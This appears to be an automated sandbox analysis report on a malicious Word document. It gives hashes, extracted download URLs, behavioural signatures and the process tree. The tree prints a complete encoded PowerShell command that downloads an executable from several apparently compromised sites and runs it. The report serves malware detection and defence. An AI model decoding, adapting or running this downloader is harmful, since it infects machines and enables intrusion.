Analysis
-
max time kernel
140s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
04-05-2024 02:24
Static task
static1
Behavioral task
behavioral1
Sample
113c78cca7bcb3422669ab5d30223d24_JaffaCakes118.doc
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
113c78cca7bcb3422669ab5d30223d24_JaffaCakes118.doc
Resource
win10v2004-20240419-en
General
-
Target
113c78cca7bcb3422669ab5d30223d24_JaffaCakes118.doc
-
Size
175KB
-
MD5
113c78cca7bcb3422669ab5d30223d24
-
SHA1
e687532ec20b9b3ffd5770b3cbcea45c4cd9516f
-
SHA256
52b222374831f845dcf2ceb94ddf3a7e56ff1b2401ca994464a2cc99cbe60aec
-
SHA512
e1c6e283b9336ef0fafda72e5731178384ac9165c23bba62aa5a1d66817ae056429096c938f20edc0ee82df66f95326489b06267b3bb942643ddbff5bd481412
-
SSDEEP
3072:O9ufstRUUKSns8T00JSHUgteMJ8qMD7gTaBBGB4c:O9ufsfgIf0pLuBBGB4c
Malware Config
Extracted
http://bonyanet.com/wp-admin/iR/
http://ofoghzagros.com/wp-admin/H/
https://ilinknepal.com/infosysnepal.com/Zdz/
https://storypostar.com/wp-admin/j/
https://www.pixelstoryteller.com/hydroplane-definition/wzb/
https://redchillicrackers.com/wp-content/p/
http://www.co-traveling.com/cgi-bin/003/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3288 2432 POwersheLL.exe 84 -
Blocklisted process makes network request 6 IoCs
flow pid Process 27 3288 POwersheLL.exe 36 3288 POwersheLL.exe 40 3288 POwersheLL.exe 46 3288 POwersheLL.exe 58 3288 POwersheLL.exe 60 3288 POwersheLL.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4392 WINWORD.EXE 4392 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3288 POwersheLL.exe 3288 POwersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3288 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 4392 WINWORD.EXE 4392 WINWORD.EXE 4392 WINWORD.EXE 4392 WINWORD.EXE 4392 WINWORD.EXE 4392 WINWORD.EXE 4392 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\113c78cca7bcb3422669ab5d30223d24_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4392
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD JABIAHMAdgBqADYAagBtAD0AKAAoACcASgA5ACcAKwAnAHQAJwApACsAJwBvAHIAJwArACcAXwA5ACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBzAEUAcgBwAHIATwBmAGkAbABlAFwAdQBfADMAeQBCADQAcgBcAGoAMAA0AGEAZwA3AFoAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAFIAZQBjAHQAbwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBDAGAAVQBSAGAASQB0AHkAUABSAGAATwBUAE8AYABjAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzACcAKQArACgAJwAxADIALAAgAHQAJwArACcAbAAnACsAJwBzADEAMQAsACcAKQArACcAIAAnACsAJwB0ACcAKwAnAGwAcwAnACkAOwAkAFoAZgBlADcAcgA4ADEAIAA9ACAAKAAoACcASQBiACcAKwAnAGYAZQAnACkAKwAoACcAOAAnACsAJwBiADYAJwApACsAJwA0ACcAKQA7ACQAWgA5ADMAYgAzAHAAZQA9ACgAJwBXACcAKwAoACcAdgAnACsAJwAwAGwAcgAyACcAKQArACcAdAAnACkAOwAkAFAAbQB1AGsAMQA1ADQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcARAAnACsAKAAnAHkAZgBVACcAKwAnAF8AMwB5ACcAKwAnAGIAJwApACsAJwA0AHIAJwArACgAJwBEACcAKwAnAHkAZgBKADAANAAnACkAKwAnAGEAZwAnACsAJwA3ACcAKwAoACcAegBEACcAKwAnAHkAZgAnACkAKQAgAC0AcgBlAHAATABhAEMARQAgACgAWwBDAGgAQQBSAF0ANgA4ACsAWwBDAGgAQQBSAF0AMQAyADEAKwBbAEMAaABBAFIAXQAxADAAMgApACwAWwBDAGgAQQBSAF0AOQAyACkAKwAkAFoAZgBlADcAcgA4ADEAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFcAawBlAGoAYwBkAG4APQAoACcARQAnACsAKAAnADEAZQAnACsAJwAxAHUAbgBqACcAKQApADsAJABZAGEAbwBnAHcAbwB1AD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABuAEUAdAAuAFcAZQBiAEMAbABJAEUAbgB0ADsAJABUAGcAcwB0AHQAdgA3AD0AKAAoACcAaAAnACsAJwB0AHQAJwArACcAcAAnACsAJwA6AC8ALwBiAG8AbgB5AGEAbgBlACcAKwAnAHQALgBjAG8AbQAnACsAJwAvAHcAcAAtAGEAZABtACcAKwAnAGkAbgAvAGkAUgAvACcAKQArACcAKgBoACcAKwAoACcAdAAnACsAJwB0AHAAJwApACsAJwA6ACcAKwAoACcALwAvAG8AJwArACcAZgBvACcAKQArACcAZwBoACcAKwAoACcAegBhAGcAJwArACcAcgBvAHMALgBjAG8AJwArACcAbQAvAHcAJwArACcAcAAtAGEAJwApACsAKAAnAGQAbQBpAG4ALwAnACsAJwBIAC8AKgBoAHQAdABwACcAKwAnAHMAJwArACcAOgAvACcAKQArACgAJwAvAGkAJwArACcAbABpACcAKQArACgAJwBuAGsAbgAnACsAJwBlAHAAYQAnACkAKwAnAGwALgAnACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAKAAnAGkAbgAnACsAJwBmAG8AcwAnACsAJwB5AHMAJwArACcAbgBlAHAAYQAnACkAKwAoACcAbAAuACcAKwAnAGMAJwApACsAJwBvAG0AJwArACgAJwAvAFoAZAB6AC8AKgAnACsAJwBoACcAKwAnAHQAdABwACcAKQArACcAcwAnACsAJwA6AC8AJwArACcALwAnACsAKAAnAHMAdABvACcAKwAnAHIAeQBwACcAKwAnAG8AJwApACsAJwBzAHQAJwArACgAJwBhAHIAJwArACcALgBjACcAKQArACcAbwAnACsAJwBtACcAKwAoACcALwAnACsAJwB3AHAAJwApACsAJwAtAGEAJwArACgAJwBkACcAKwAnAG0AaQBuAC8AJwApACsAKAAnAGoALwAnACsAJwAqAGgAdAB0ACcAKQArACcAcABzACcAKwAoACcAOgAvAC8AJwArACcAdwB3AHcAJwArACcALgBwAGkAeABlAGwAcwAnACsAJwB0AG8AcgAnACkAKwAoACcAeQAnACsAJwB0ACcAKwAnAGUAbABsACcAKwAnAGUAcgAuAGMAbwBtAC8AaAB5AGQAcgAnACsAJwBvAHAAbABhAG4AJwApACsAKAAnAGUALQBkAGUAZgAnACsAJwBpAG4AaQAnACsAJwB0AGkAbwBuACcAKwAnAC8AdwB6AGIAJwArACcALwAqACcAKwAnAGgAdAAnACkAKwAoACcAdABwAHMAOgAnACsAJwAvACcAKwAnAC8AcgBlACcAKwAnAGQAYwBoAGkAbABsACcAKwAnAGkAYwByACcAKQArACgAJwBhAGMAJwArACcAawBlACcAKQArACgAJwByACcAKwAnAHMALgBjAG8AbQAnACsAJwAvAHcAJwApACsAKAAnAHAALQAnACsAJwBjACcAKwAnAG8AbgB0AGUAJwArACcAbgB0AC8AcAAnACkAKwAoACcALwAqAGgAJwArACcAdAAnACkAKwAnAHQAJwArACgAJwBwACcAKwAnADoALwAvAHcAJwArACcAdwB3ACcAKQArACcALgBjACcAKwAnAG8AJwArACgAJwAtAHQAJwArACcAcgBhAHYAZQAnACkAKwAoACcAbABpAG4AZwAuAGMAJwArACcAbwBtACcAKwAnAC8AYwAnACsAJwBnACcAKQArACgAJwBpAC0AYgBpAG4ALwAnACsAJwAwADAAMwAnACkAKwAnAC8AJwApAC4AIgBTAGAAcABsAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFUAbwA2AG0AdgA3AHcAPQAoACgAJwBLACcAKwAnADkAdwBvADAAJwApACsAJwBtADYAJwApADsAZgBvAHIAZQBhAGMAaAAoACQATwBiAHgAOQBkAHkAMQAgAGkAbgAgACQAVABnAHMAdAB0AHYANwApAHsAdAByAHkAewAkAFkAYQBvAGcAdwBvAHUALgAiAEQAYABvAGAAVwBOAEwAbwBgAEEARABGAGkAbABFACIAKAAkAE8AYgB4ADkAZAB5ADEALAAgACQAUABtAHUAawAxADUANAApADsAJABRAHMAYgAzADIAdQA0AD0AKAAoACcATwAxACcAKwAnADcAJwApACsAKAAnAGIAJwArACcAawBvADgAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQAUABtAHUAawAxADUANAApAC4AIgBMAGAAZQBOAGAAZwBUAGgAIgAgAC0AZwBlACAAMgA5ADgANQAxACkAIAB7ACYAKAAnAEkAbgB2ACcAKwAnAG8AawBlAC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAKAAkAFAAbQB1AGsAMQA1ADQAKQA7ACQASQB0AGQANwBnAGIAXwA9ACgAJwBRACcAKwAoACcANgBmAHIAJwArACcAMAAnACkAKwAnAGMANQAnACkAOwBiAHIAZQBhAGsAOwAkAFYAZABjAGwAcgA4AGoAPQAoACcAWgAnACsAKAAnADMANgAnACsAJwBhAHUAaAAnACkAKwAnAGEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABEAGMAeAA0ADIAbwBxAD0AKAAnAEIAJwArACcAZABlACcAKwAoACcAegB5AHAAJwArACcAdgAnACkAKQA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3288
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
174KB
MD50943d5918c10d730e5313297cb61b76e
SHA1ecb84767b88eee7fdcf4bbb5a5d82f796e3f09f3
SHA256b5e20f7a2454542d81c9228f1020db57fbb6cacf544ba391dbe18ae26a05203f
SHA512bb70423f467480d972b206db148bd532ca1dc17e1d849a37bf9786367563fe8d40aeecbbca2355a32231b41023ccca94b592902023a3aea027f6b2e3ae83d390